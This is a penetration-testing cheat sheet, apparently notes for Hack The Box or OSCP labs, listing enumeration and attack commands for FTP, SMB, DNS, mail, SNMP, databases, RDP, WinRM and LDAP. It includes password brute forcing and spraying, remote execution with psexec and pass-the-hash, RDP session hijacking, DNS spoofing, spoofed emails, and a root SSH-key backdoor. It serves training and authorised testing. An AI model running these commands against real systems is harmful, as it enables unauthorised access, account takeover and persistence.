Protocols & Services

FTP / 21

# Interact with the FTP service on the target.
ftp <FQDN/IP>
nc -nv <FQDN/IP> 21
telnet <FQDN/IP> 21

# Interact with the FTP service on the target using encrypted connection.
openssl s_client -connect <FQDN/IP>:21 -starttls ftp

# Anonymous login
anonymous : anonymous
_anonymous :
_ftp : ftp

# Download all available files on the target FTP server.
wget -m --no-passive ftp://anonymous:anonymous@<target>
prompt no
mget * .

# Downlaod all
wget -m --user="anonymous" --password="anonymous" ftp://$ip:$port

# Brute Forcing avec Medusa
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
# FTP Bounce Attack
nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2

SMB / 139 , 445

# SMB scan with nmap
nmap -v -p 139,445 --script smb* 192.168.10.0

# Collect NetBIOS information with nbtscan
sudo nbtscan -r 192.168.10.0/24

# Enumerating SMB shares using null session authentication.
crackmapexec smb <IP> --shares -u '' -p ''
smbclient -N -L //<IP>
smbclient //<IP>/<share>                     # Connect to a specific SMB share.
smbmap -H <IP> -r                            # -r ou -R for récursive
smbmap -H <IP> --download "notes\note.txt"   # to download a file

# Interaction with the target using RPC.
rpcclient -U "" <FQDN/IP> 
srvinfo            # Server information.
enumdomains        # Enumerate all domains that are deployed in the network.
querydominfo       # Provides domain, server, and user information of deployed domains.
netshareenumall    # Enumerates all available shares.
netsharegetinfo <share>   # Provides information about a specific share.
enumdomusers       # Enumerates all domain users.
queryuser <RID>    # Provides information about a specific user.
setuserinfo2 MOLLY.SMITH 23 'Password123!'    # Change pwd of a user

# Username enumeration
samrdump.py <FQDN/IP>
enum4linux-ng.py <FQDN/IP> -A -C
impacket-lookupsid -no-pass 'guest@manager.htb' 10000
nxc smb 10.10.11.236 -u guest -p ''  --rid-brute 10000  

# List remote shares with 'net view'
net view \\dc01 /all

# Interacting with SMB using CMD
C:\htb> dir \\192.168.220.129\Finance\
C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
C:\htb> dir n: /a-d /s /b            # list all files in n:
C:\htb> dir n: /a-d /s /b            # search for specific names in files
c:\htb> findstr /s /i cred n:\*.*    # search for a specific word within a file

# Interacting with SMB using PowerShell
Get-ChildItem \\192.168.220.129\Finance\

# Authenticate to a share
$username = 'us3r'
$password = 'P@sswd'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\10.10.0.9\Finance" -PSProvider "FileSystem" -Credential $cred

# Search for specific names in files
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

# Search for a specific word within a file
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List

# Interacting with SMB using Linux
sudo mount -t cifs -o username=us3r,password=P@sswd,domain=. //10.10.0.9/Finance /mnt/Finance

# Connect to a remote machine with a local administrator : impacket-smbexec, impacket-atexec
impacket-psexec administrator:'Password123!'@10.10.110.17
use exploit/windows/smb/psexec
smbclient \\\\10.10.110.17\\secrets -U Administrator --pw-nt-hash <NTLMhash>

# Execute command with cme
crackmapexec smb 10.10.1.2 -u Administrator -p 'P@sswd' -x 'whoami' --exec-method smbexec

# Metasploit exploit module used to check if a host is vulnerable to ms17_010
use auxiliary/scanner/smb/smb_ms17_010
# Metasploit exploit module used to exploit a host if is vulnerable to ms17_010
use exploit/windows/smb/ms17_010_psexec
# CVE-2020-0796 "SMBGhost"

NFS / 2049

# Nmap
sudo nmap --script nfs* <FQDN/IP> -sV -p111,2049

# Show available NFS shares.
showmount -e <FQDN/IP> 

# Mount the specific NFS share to ./target-NFS
sudo mount -t nfs <FQDN/IP>:/<share> ./target-NFS/ -o nolock 

# Unmount the specific NFS share.
umount ./target-NFS 

Kerberos / 88

# sync time with DC
sudo ntpdate $IP

DNS / 53

# ANY request to the specific nameserver.
dig any domain.htb @<nameserver> 

# AXFR request to the specific nameserve AKA DNS Zone Transfer
dig axfr domain.htb @<nameserver> 
fierce --domain zonetransfer.me

# Automate A,AAAA,MX,HINFO,CNAME,NS,SOA,TXT,DNSKEY,AXFR,PTR requests
dnsrecon -d domain.htb -t std
dnsenum domain.htb
for type in A AAAA MX HINFO CNAME NS SOA TXT DNSKEY AXFR PTR; do echo -e "\n=== $type Records ==="; host -t $type domain.htb; done
"A","AAAA","MX","HINFO","CNAME","NS","SOA","TXT","DNSKEY","AXFR","PTR" | ForEach-Object { Write-Host "=== $_ Records ==="; nslookup -type="$_" domain.htb }

# Subdomain brute forcing.
dnsrecon -d domain.htb -D ./wordlist.txt -t brt
dnsenum --dnsserver <nameserver> --enum -p 0 -s 0 -o subs.txt -f ~/wordlist.txt domain.htb
subbrute domain.htb -s ./wordlist.txt -r ./resolvers.txt
for sub in $(cat wordlist.txt);do dig $sub.domain.htb @10.1.1.1 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subs.txt;done
for sub in $(cat wordlist.txt); do host $sub.domain.htb; done

# If PTR records configured we can do reverse lookups
for ip in $(seq 1 254); do host 51.10.10.$ip; done | grep -v "not found"

# DNS spoofing AKA DNS Cache Poisoning
# Change etter.dns file and run ettercap. set target 1 (cible) and target 2 (gateway) and activate dns_spoof plugin
cat /etc/ettercap/etter.dns
inlanefreight.com      A   192.168.225.110    # Attacker IP
*.inlanefreight.com    A   192.168.225.110

Email Services : SMTP : 25,465,587 / IMAP4 : 143,993 / POP3 : 110,995

sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 <IP>

# SMTP : 25,465,587
telnet <IP> 25
# VRFY, EXPN, RCPT TO : can be used to enumerate valid usernames
smtp-user-enum -M RCPT -U userlist.txt [-D inlanefreight.htb] -t <IP>
# Password Attack : SMTP, POP3, IMAP4
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
# Open Relay
nmap -p25 -Pn --script smtp-open-relay <IP>
swaks --from notif@domain.com --to employees@domain.com --header 'Subject: Company Notif' --body 'Hi All, Test message' --server 10.10.1.1
sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s $ip:25 -u 'Your spreadsheet' -m 'Here is your requested spreadsheet' -a Hepet.odt

# IMAP4 : 143,993
# use Evolution for GUI
# Log in to the IMAPS service using cURL.
curl -k 'imaps://<FQDN/IP>' --user <user>:<password> 
# Connect to the IMAPS service.
openssl s_client -connect <FQDN/IP>:imaps
# IMAPS Commands examples
1 LOGIN username password    # User's login.
1 LIST "" *                  # Lists all directories.
1 CREATE "INBOX"             # Creates a mailbox with a specified name.
1 DELETE "INBOX"             # Deletes a mailbox.
1 RENAME "ToRead" "Important"    # Renames a mailbox.
1 LSUB "" *                  # Returns a subset of names from the set of names that the User has declared as being active or subscribed.
1 SELECT INBOX               # Selects a mailbox
1 UNSELECT INBOX             # Exits the selected mailbox.
1 FETCH <ID> all             # Retrieves data associated with a message in the mailbox.
1 CLOSE                      # Removes all messages with the Deleted flag set.
1 LOGOUT                     # Closes the connection with the IMAP server.

# POP3 : 110,995
# Connect to the POP3s service.
openssl s_client -connect <FQDN/IP>:pop3s
# POP3s Commands examples
USER username       # Identifies the user : can be used for user enum
PASS password       # Authentication of the user using its password.
STAT                # Requests the number of saved emails from the server.
LIST                # Requests from the server the number and size of all emails.
RETR id             # Requests the server to deliver the requested email by ID.
DELE id             # Requests the server to delete the requested email by ID.
CAPA                # Requests the server to display the server capabilities.
RSET                # Requests the server to reset the transmitted information.
QUIT                # Closes the connection with the POP3 server.

# IMAP/SMTP Client
evolution

# Cloud Enumeration
# Username enumeration and password spraying (o365spray, MailSniper, CredKing)
./o365spray.py --enum -U users.txt --domain msplaintext.xyz 
./o365spray.py --spray -U users.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

SNMP / 161 UDP

# SNMP with nmap
sudo nmap -sU --open -p 161 192.168.0.1-254 -oG open-snmp.txt
nmap -sU -p161 --script "snmp-*" 192.168.104.156

# Bruteforcing community strings of the SNMP service. 
onesixtyone -c community-strings.list <$IP>    # snmp.txt
nmap -sU <$IP> -p 161 --script=snmp-brute -Pn --script-args snmp-brute.communitiesdb=snmp.txt

# Querying OIDs using snmpwalk.
snmpwalk -v2c -c <community string> <$IP>
snmpwalk -c public -v1 -t <$IP>
snmpbulkwalk -c public -v2c <$IP> .
snmpbulkwalk -c public -v2c <$IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull 


# Bruteforcing SNMP service OIDs.
braa <community string>@<$IP>:.1.*

# Using snmpwalk to enumerate Windows users
snmpwalk -c public -v1 192.168.50.1 1.3.6.1.4.1.77.1.2.25

1.3.6.1.2.1.25.1.6.0	    # System Processes
1.3.6.1.2.1.25.4.2.1.2	    # Running Programs
1.3.6.1.2.1.25.4.2.1.4	    # Processes Path
1.3.6.1.2.1.25.2.3.1.4	    # Storage Units
1.3.6.1.2.1.25.6.3.1.2	    # Software Name
1.3.6.1.4.1.77.1.2.25	    # User Accounts
1.3.6.1.2.1.6.13.1.3	    # TCP Local Ports

MySQL / 3306

# Login to the MySQL server.
mysql -u username -pPassword123 -h <FQDN/IP>            # Linux
mysql.exe -u username -pPassword123 -h <FQDN/IP>        # Windows

# GUI Application for MSSQL, MySQL, PostgreSQL
dbeaver &

MSSQL / 1433

# Banner Grabbing
nmap -Pn -sV -sC -p1433 10.10.10.125

# MSSQL Ping in Metasploit
auxiliary/scanner/mssql/mssql_ping

# NMAP MSSQL Script Scan
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP/FQDN>

IPMI / 623 UDP

# Nmap
sudo nmap -sU --script ipmi-version -p 623 IP

# IPMI version detection.
msf6 auxiliary(scanner/ipmi/ipmi_version)

# Dump IPMI hashes.
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes)

Linux Remote Management

# Remote security audit against the target SSH service.
ssh-audit.py <FQDN/IP>

# Log in to the SSH server using the SSH client : -v optional for verbosity
ssh [-v] <user>@<FQDN/IP>

# Create a new SSH key
ssh-keygen -f key 

# Add the generated public key to the user
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys

# Log in to the SSH server using private key.
ssh -i private.key <user>@<FQDN/IP> -vvv

# Check whether if key is passphrase-protected
ssh-keygen -y -f id_rsa >/dev/null && echo "no passphrase" || echo "passphrase-protected or invalid"

# If ssh complain about libcrypto or key format
chmod 600 id_rsa
dos2unix id_rsa
vim --clean id_rsa

# Enforce password-based authentication.
ssh <user>@<FQDN/IP> -o PreferredAuthentications=password

# Scanning for Rsync
sudo nmap -sV -p 873 <FQDN/IP>

# Probing for Accessible Shares
nc -nv <FQDN/IP> 873

# Enumerating an Open Share
rsync -av --list-only rsync://127.0.0.1/dev

# Sync the file to attack host
rsync -av rsync://127.0.0.1/dev

RDP / 3389

# Nmap
nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

# Check the security settings of the RDP service.
rdp-sec-check.pl <FQDN/IP>

# Log in to the RDP server from Linux. xfreerdp3 /size:1920x1080
xfreerdp /u:<usr> /p:"<pass>" /v:<IP> /dynamic-resolution +clipboard -cert:ignore -drive:share,/home/
rdesktop -u user <FQDN/IP>

# Password spraying
hydra -L users.txt -p 'password123' 192.168.2.143 rdp
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

# RDP Session Hijacking
# We need SYSTEM privileges for this to work
query user
tscon {TARGET_SESSION_ID} /dest:{OUR_SESSION_NAME}
# Admin priv to SYSTEM priv by creating a service / no longer works on Server 2019
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
net start sessionhijack

# CVE-2019-0708 BlueKeep https://github.com/RICSecLab/CVE-2019-0708

WinRM / 5985

# Log in to the WinRM server.
# Windows PS
Test-WSMan <FQDN/IP>
# Linux
evil-winrm -i <FQDN/IP> -u <user> -p <password> 

# Execute command using the WMI service.
wmiexec.py <user>:"<password>"@<FQDN/IP> "<system command>" 

Oracle TNS / 1521

# Perform a variety of scans to gather information about the Oracle database services and its components.
./odat.py all -s <FQDN/IP> 

# Log in to the Oracle database.
sqlplus <user>/<pass>@<FQDN/IP>/<db>

# Upload a file with Oracle RDBMS.
./odat.py utlfile -s <FQDN/IP> -d <db> -U <user> -P <pass> --sysdba --putFile C:\\insert\\path file.txt ./file.txt

LDAP / 389, 636, 3268, 3269

# Enumerate ldap users
ldapsearch -h 10.10.1.1 -bx "DC=oscp,DC=exam"
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.175.122" "(objectclass=*)"
# Dump domaine information
ldapdomaindump 10.10.1.1 -u "OSCP.EXAM\user" -p P@ssw0rd --no-json --no-grep -o ldapdomaindump